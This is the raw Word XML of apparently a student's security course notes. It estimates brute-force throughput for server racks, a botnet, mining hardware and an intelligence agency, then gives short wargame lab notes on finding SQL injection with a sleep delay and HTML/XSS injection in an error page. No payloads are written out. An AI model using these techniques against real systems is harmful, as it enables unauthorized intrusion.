            <w:r w:rsidRPr="006576AD">
              <w:t>I found a moderately setup rack with 2xAMD EPYC™ 9355 Processor 32-core 3.55GHz 256MB Cache (280W) per unit for $75-100k so they could</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="006576AD">
              <w:t>impl</w:t>
            </w:r>
            <w:r w:rsidR="00105939">
              <w:t>e</w:t>
            </w:r>
            <w:r w:rsidRPr="006576AD">
              <w:t>ment about 18 when you then account for other infrastructure costs</w:t>
            </w:r>
            <w:r w:rsidR="008A7E74">
              <w:t>. Assuming each core is in full utilisation:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C07CC6C" w14:textId="77777777" w:rsidR="008A7E74" w:rsidRPr="008B59EF" w:rsidRDefault="008A7E74" w:rsidP="008A7E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
            </w:pPr>
            <m:oMathPara>
              <m:oMath>
                <m:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                  </w:rPr>
                  <m:t>≈18×2×32×3.55×</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 4,089,600,000,000 bits/second</m:t>
                </m:r>
              </m:oMath>
            </m:oMathPara>
          </w:p>
          <w:p w14:paraId="0AB88AA9" w14:textId="70DC7E0D" w:rsidR="008B59EF" w:rsidRPr="00553FBC" w:rsidRDefault="008B59EF" w:rsidP="008A7E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
            </w:pPr>
            <m:oMathPara>
              <m:oMath>
                <m:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                  </w:rPr>
                  <m:t>24×4,089,600,000,000</m:t>
                </m:r>
                <m:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                  </w:rPr>
                  <m:t>×3600</m:t>
                </m:r>
                <m:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                  </w:rPr>
                  <m:t xml:space="preserve">= </m:t>
                </m:r>
                <m:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                  </w:rPr>
                  <m:t>3.5334144×</m:t>
                </m:r>
                <m:sSup>
                  <m:sSupPr>
                    <m:ctrlPr>
                      <w:rPr>
                        <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                        <w:i/>
                      </w:rPr>
                    </m:ctrlPr>
                  </m:sSupPr>
                  <m:e>
                    <m:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                      </w:rPr>
                      <m:t>10</m:t>
                    </m:r>
                  </m:e>
                  <m:sup>
                    <m:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                      </w:rPr>
                      <m:t>17</m:t>
                    </m:r>
                  </m:sup>
                </m:sSup>
                <m:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                  </w:rPr>
                  <m:t>per day</m:t>
                </m:r>
              </m:oMath>
            </m:oMathPara>
          </w:p>
          <w:p w14:paraId="3D6090E6" w14:textId="77777777" w:rsidR="00553FBC" w:rsidRDefault="00553FBC" w:rsidP="008A7E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="367CBC45" w14:textId="77777777" w:rsidR="00553FBC" w:rsidRDefault="00553FBC" w:rsidP="00553FBC">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00553FBC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t xml:space="preserve">Large </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00553FBC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Botnet</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="648D88F5" w14:textId="77777777" w:rsidR="00FA64B7" w:rsidRDefault="00DE490B" w:rsidP="00DE490B">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Assuming 5 million devices of the office workers device</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E55A46E" w14:textId="77777777" w:rsidR="00DE490B" w:rsidRDefault="00DE490B" w:rsidP="00DE490B">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">The 25 </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>Million</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> dollar budget is to maintain exploitation services and infrastructure to command the bot net.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A811074" w14:textId="77777777" w:rsidR="00DE490B" w:rsidRDefault="00E05570" w:rsidP="00DE490B">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Hence using the office worker PC:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35D67C23" w14:textId="044366F9" w:rsidR="00E05570" w:rsidRPr="00831FB7" w:rsidRDefault="00B9509C" w:rsidP="00E05570">
            <m:oMathPara>
              <m:oMath>
                <m:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                  </w:rPr>
                  <m:t>5000000×6×4.7×</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m:t>
                </m:r>
                <m:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                  </w:rPr>
                  <m:t>24×3600</m:t>
                </m:r>
                <m:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                  </w:rPr>
                  <m:t>≈</m:t>
                </m:r>
                <m:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                  </w:rPr>
                  <m:t>1.21824×</m:t>
                </m:r>
                <m:sSup>
                  <m:sSupPr>
                    <m:ctrlPr>
                      <w:rPr>
                        <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                        <w:i/>
                      </w:rPr>
                    </m:ctrlPr>
                  </m:sSupPr>
                  <m:e>
                    <m:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                      </w:rPr>
                      <m:t>10</m:t>
                    </m:r>
                  </m:e>
                  <m:sup>
                    <m:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                      </w:rPr>
                      <m:t>22</m:t>
                    </m:r>
                  </m:sup>
                </m:sSup>
                <m:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                  </w:rPr>
                  <m:t xml:space="preserve">bits/day </m:t>
                </m:r>
              </m:oMath>
            </m:oMathPara>
          </w:p>
          <w:p w14:paraId="71A6BC63" w14:textId="77777777" w:rsidR="00831FB7" w:rsidRDefault="00831FB7" w:rsidP="00E05570">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00831FB7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t xml:space="preserve">Crypto </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00831FB7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Miner</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="2F456CC0" w14:textId="77777777" w:rsidR="00831FB7" w:rsidRDefault="00B55423" w:rsidP="00B55423">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Assuming the hardware can compute per second the same as its hash rates, ignoring the differences that may lie within the ASIC algorithm</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E6D1BAD" w14:textId="77777777" w:rsidR="00B55423" w:rsidRDefault="00B55423" w:rsidP="00B55423">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Hardware costs 10k each and is a normal device hence with the budget there are 5000 devices</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04F6881D" w14:textId="54890C09" w:rsidR="00B55423" w:rsidRPr="00831FB7" w:rsidRDefault="00B55423" w:rsidP="00B55423">
            <m:oMathPara>
              <m:oMath>
                <m:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                  </w:rPr>
                  <m:t>5000×270×</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×24×3600≈</m:t>
                </m:r>
                <m:r>
                  <m:rPr>
                    <m:sty m:val="p"/>
                  </m:rPr>
                  <w:rPr>
                    <w:rFonts w:ascii="Cambria Math" w:eastAsia="Times New Roman" w:hAnsi="Cambria Math" w:cs="Open Sans"/>
                    <w:color w:val="333333"/>
                    <w:lang w:eastAsia="en-AU"/>
                  </w:rPr>
                  <m:t>1.1664x</m:t>
                </m:r>
                <m:sSup>
                  <m:sSupPr>
                    <m:ctrlPr>
                      <w:rPr>
                        <w:rFonts w:ascii="Cambria Math" w:eastAsia="Times New Roman" w:hAnsi="Cambria Math" w:cs="Open Sans"/>
                        <w:color w:val="333333"/>
                        <w:lang w:eastAsia="en-AU"/>
                      </w:rPr>
                    </m:ctrlPr>
                  </m:sSupPr>
                  <m:e>
                    <m:r>
                      <m:rPr>
                        <m:sty m:val="p"/>
                      </m:rPr>
                      <w:rPr>
                        <w:rFonts w:ascii="Cambria Math" w:eastAsia="Times New Roman" w:hAnsi="Cambria Math" w:cs="Open Sans"/>
                        <w:color w:val="333333"/>
                        <w:lang w:eastAsia="en-AU"/>
                      </w:rPr>
                      <m:t>10</m:t>
                    </m:r>
                  </m:e>
                  <m:sup>
                    <m:r>
                      <m:rPr>
                        <m:sty m:val="p"/>
                      </m:rPr>
                      <w:rPr>
                        <w:rFonts w:ascii="Cambria Math" w:eastAsia="Times New Roman" w:hAnsi="Cambria Math" w:cs="Open Sans"/>
                        <w:color w:val="333333"/>
                        <w:lang w:eastAsia="en-AU"/>
                      </w:rPr>
                      <m:t>23</m:t>
                    </m:r>
                  </m:sup>
                </m:sSup>
                <m:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Cambria Math" w:eastAsia="Times New Roman" w:hAnsi="Cambria Math" w:cs="Open Sans"/>
                    <w:color w:val="333333"/>
                    <w:lang w:eastAsia="en-AU"/>
                  </w:rPr>
                  <m:t>bits/day</m:t>
                </m:r>
              </m:oMath>
            </m:oMathPara>
          </w:p>
          <w:p w14:paraId="37FBCA32" w14:textId="64EA650B" w:rsidR="00B55423" w:rsidRDefault="00433997" w:rsidP="00B55423">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="333333"/>
                <w:u w:val="single"/>
                <w:lang w:eastAsia="en-AU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00433997">
              <w:rPr>
                <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="333333"/>
                <w:u w:val="single"/>
                <w:lang w:eastAsia="en-AU"/>
              </w:rPr>
              <w:t>Foreign Intelligence Agency:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E72CB05" w14:textId="3D6BDD47" w:rsidR="00FB0A49" w:rsidRDefault="0018464D" w:rsidP="00FB0A49">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Open Sans"/>
                <w:color w:val="333333"/>
                <w:lang w:eastAsia="en-AU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A90EF5">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Open Sans"/>
                <w:color w:val="333333"/>
                <w:lang w:eastAsia="en-AU"/>
              </w:rPr>
              <w:t>Note that we likely don’t have public knowledge of all processors available to some intelligence agencies which can in some cases perform exceptionally better than an estimate</w:t>
            </w:r>
            <w:r w:rsidR="00A90EF5">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Open Sans"/>
                <w:color w:val="333333"/>
                <w:lang w:eastAsia="en-AU"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FDE11F6" w14:textId="355B5199" w:rsidR="00A90EF5" w:rsidRDefault="00A90EF5" w:rsidP="00FB0A49">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Open Sans"/>
                <w:color w:val="333333"/>
                <w:lang w:eastAsia="en-AU"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Open Sans"/>
                <w:color w:val="333333"/>
                <w:lang w:eastAsia="en-AU"/>
              </w:rPr>
              <w:t>However</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Open Sans"/>
                <w:color w:val="333333"/>
                <w:lang w:eastAsia="en-AU"/>
              </w:rPr>
              <w:t xml:space="preserve"> from research around NSA sites currently the estimated compute power is approximately 2 exaflops </w:t>
            </w:r>
            <w:r w:rsidR="00A13563">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Open Sans"/>
                <w:color w:val="333333"/>
                <w:lang w:eastAsia="en-AU"/>
              </w:rPr>
              <w:t xml:space="preserve">with at least 2 of </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="00A13563">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Open Sans"/>
                <w:color w:val="333333"/>
                <w:lang w:eastAsia="en-AU"/>
              </w:rPr>
              <w:t xml:space="preserve">these type of </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00A13563">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Open Sans"/>
                <w:color w:val="333333"/>
                <w:lang w:eastAsia="en-AU"/>
              </w:rPr>
              <w:t>super computing</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00A13563">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Open Sans"/>
                <w:color w:val="333333"/>
                <w:lang w:eastAsia="en-AU"/>
              </w:rPr>
              <w:t xml:space="preserve"> facilities</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="00A13563">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Open Sans"/>
                <w:color w:val="333333"/>
                <w:lang w:eastAsia="en-AU"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Open Sans"/>
                <w:color w:val="333333"/>
                <w:lang w:eastAsia="en-AU"/>
              </w:rPr>
              <w:t>as assuming they are</w:t>
            </w:r>
            <w:r w:rsidR="00A13563">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Open Sans"/>
                <w:color w:val="333333"/>
                <w:lang w:eastAsia="en-AU"/>
              </w:rPr>
              <w:t xml:space="preserve"> only need on floating point operation for each decision/key calculation [Large Bit Width Processing :O]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="440F11A5" w14:textId="66550993" w:rsidR="00A90EF5" w:rsidRPr="00A90EF5" w:rsidRDefault="00A90EF5" w:rsidP="00A90EF5">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Open Sans"/>
                <w:color w:val="333333"/>
                <w:lang w:eastAsia="en-AU"/>
              </w:rPr>
            </w:pPr>
            <m:oMathPara>
              <m:oMath>
                <m:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Cambria Math" w:eastAsia="Times New Roman" w:hAnsi="Cambria Math" w:cs="Open Sans"/>
                    <w:color w:val="333333"/>
                    <w:lang w:eastAsia="en-AU"/>
                  </w:rPr>
                  <m:t>2×</m:t>
                </m:r>
                <m:sSup>
                  <m:sSupPr>
                    <m:ctrlPr>
                      <w:rPr>
                        <w:rFonts w:ascii="Cambria Math" w:eastAsia="Times New Roman" w:hAnsi="Cambria Math" w:cs="Open Sans"/>
                        <w:i/>
                        <w:color w:val="333333"/>
                        <w:lang w:eastAsia="en-AU"/>
                      </w:rPr>
                    </m:ctrlPr>
                  </m:sSupPr>
                  <m:e>
                    <m:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Cambria Math" w:eastAsia="Times New Roman" w:hAnsi="Cambria Math" w:cs="Open Sans"/>
                        <w:color w:val="333333"/>
                        <w:lang w:eastAsia="en-AU"/>
                      </w:rPr>
                      <m:t>10</m:t>
                    </m:r>
                  </m:e>
                  <m:sup>
                    <m:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Cambria Math" w:eastAsia="Times New Roman" w:hAnsi="Cambria Math" w:cs="Open Sans"/>
                        <w:color w:val="333333"/>
                        <w:lang w:eastAsia="en-AU"/>
                      </w:rPr>
                      <m:t>18</m:t>
                    </m:r>
                  </m:sup>
                </m:sSup>
                <m:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Cambria Math" w:eastAsia="Times New Roman" w:hAnsi="Cambria Math" w:cs="Open Sans"/>
                    <w:color w:val="333333"/>
                    <w:lang w:eastAsia="en-AU"/>
                  </w:rPr>
                  <m:t>×24×3600≈3.456×</m:t>
                </m:r>
                <m:sSup>
                  <m:sSupPr>
                    <m:ctrlPr>
                      <w:rPr>
                        <w:rFonts w:ascii="Cambria Math" w:eastAsia="Times New Roman" w:hAnsi="Cambria Math" w:cs="Open Sans"/>
                        <w:i/>
                        <w:color w:val="333333"/>
                        <w:lang w:eastAsia="en-AU"/>
                      </w:rPr>
                    </m:ctrlPr>
                  </m:sSupPr>
                  <m:e>
                    <m:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Cambria Math" w:eastAsia="Times New Roman" w:hAnsi="Cambria Math" w:cs="Open Sans"/>
                        <w:color w:val="333333"/>
                        <w:lang w:eastAsia="en-AU"/>
                      </w:rPr>
                      <m:t>10</m:t>
                    </m:r>
                  </m:e>
                  <m:sup>
                    <m:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Cambria Math" w:eastAsia="Times New Roman" w:hAnsi="Cambria Math" w:cs="Open Sans"/>
                        <w:color w:val="333333"/>
                        <w:lang w:eastAsia="en-AU"/>
                      </w:rPr>
                      <m:t>23</m:t>
                    </m:r>
                  </m:sup>
                </m:sSup>
                <m:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Cambria Math" w:eastAsia="Times New Roman" w:hAnsi="Cambria Math" w:cs="Open Sans"/>
                    <w:color w:val="333333"/>
                    <w:lang w:eastAsia="en-AU"/>
                  </w:rPr>
                  <m:t>bits/day</m:t>
                </m:r>
              </m:oMath>
            </m:oMathPara>
          </w:p>
          <w:p w14:paraId="096B6636" w14:textId="41C2D541" w:rsidR="00B55423" w:rsidRPr="00831FB7" w:rsidRDefault="00B55423" w:rsidP="00B55423"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="283B9BD1" w14:textId="4FA87121" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="181B8E52" w:rsidP="181B8E52">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6ACDB6C8" w14:textId="5B4BAFC5" w:rsidR="42E83AC9" w:rsidRPr="00ED5F6D" w:rsidRDefault="42E83AC9" w:rsidP="42E83AC9"/>
    <w:p w14:paraId="1F220764" w14:textId="3D846552" w:rsidR="53506ABB" w:rsidRPr="00ED5F6D" w:rsidRDefault="53506ABB" w:rsidP="42E83AC9">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="270"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED5F6D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Extended</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E80F83" w14:textId="3F314CDE" w:rsidR="53506ABB" w:rsidRPr="00ED5F6D" w:rsidRDefault="53506ABB" w:rsidP="42E83AC9">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="160" w:after="80"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId20">
        <w:r w:rsidRPr="00ED5F6D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
            <w:sz w:val="32"/>
            <w:szCs w:val="32"/>
          </w:rPr>
          <w:t>Week 3 Extension Wargames</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="06A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="42E83AC9" w:rsidRPr="00ED5F6D" w14:paraId="5D6C77EB" w14:textId="77777777" w:rsidTr="42E83AC9">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69BFFA4F" w14:textId="440E681F" w:rsidR="42E83AC9" w:rsidRPr="00ED5F6D" w:rsidRDefault="42E83AC9" w:rsidP="42E83AC9"/>
          <w:p w14:paraId="393EE6A0" w14:textId="44C759A3" w:rsidR="42E83AC9" w:rsidRDefault="00E838A9" w:rsidP="42E83AC9">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E838A9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>SQLi4</w:t>
            </w:r>
            <w:r w:rsidR="00C54874">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1466365F" w14:textId="3B68287C" w:rsidR="00C54874" w:rsidRDefault="00C54874" w:rsidP="42E83AC9"/>
          <w:p w14:paraId="3F4D0AB4" w14:textId="68BAA646" w:rsidR="003F1846" w:rsidRDefault="003F1846" w:rsidP="003F1846">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Initially I tried to break the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sql</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> by breaking the user input here to prove that I can take control and used a sleep and this caused the gateway to fail rather than an exception being pulled so that helped me figure out the open door</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5EBD33D2" w14:textId="501DA3E9" w:rsidR="003F1846" w:rsidRPr="00C54874" w:rsidRDefault="003F1846" w:rsidP="003F1846">
            <w:pPr>
              <w:ind w:left="360"/>
            </w:pPr>
            <w:r w:rsidRPr="003F1846">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C25F438" wp14:editId="79F75FDD">
                  <wp:extent cx="4683318" cy="1676688"/>
                  <wp:effectExtent l="0" t="0" r="3175" b="0"/>
                  <wp:docPr id="45927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74888" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId21"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4696926" cy="1681560"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="12BBF377" w14:textId="3ED0AE2F" w:rsidR="42E83AC9" w:rsidRPr="00ED5F6D" w:rsidRDefault="003F1846" w:rsidP="42E83AC9">
            <w:r w:rsidRPr="003F1846">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66B7076E" wp14:editId="66240762">
                  <wp:extent cx="5498327" cy="2753275"/>
                  <wp:effectExtent l="0" t="0" r="7620" b="9525"/>
                  <wp:docPr id="69401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17140" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId22"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5501315" cy="2754771"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="06110A1E" w14:textId="78DB4C54" w:rsidR="42E83AC9" w:rsidRPr="00ED5F6D" w:rsidRDefault="42E83AC9" w:rsidP="42E83AC9"/>
          <w:p w14:paraId="609BBD08" w14:textId="4E6701A4" w:rsidR="42E83AC9" w:rsidRPr="00ED5F6D" w:rsidRDefault="42E83AC9" w:rsidP="42E83AC9"/>
          <w:p w14:paraId="236E0C9D" w14:textId="589427DD" w:rsidR="42E83AC9" w:rsidRPr="00AE14A7" w:rsidRDefault="00AE14A7" w:rsidP="42E83AC9">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AE14A7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>XSS 5:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22115BF1" w14:textId="53C70D99" w:rsidR="00AE14A7" w:rsidRDefault="00AE14A7" w:rsidP="00AE14A7">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>I could find that the error page in the URL take HTML injection and by first trying to bold it and put an image in</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A7663F7" w14:textId="00AEBCF6" w:rsidR="00C27111" w:rsidRDefault="00AE14A7" w:rsidP="00F5572B">
            <w:pPr>
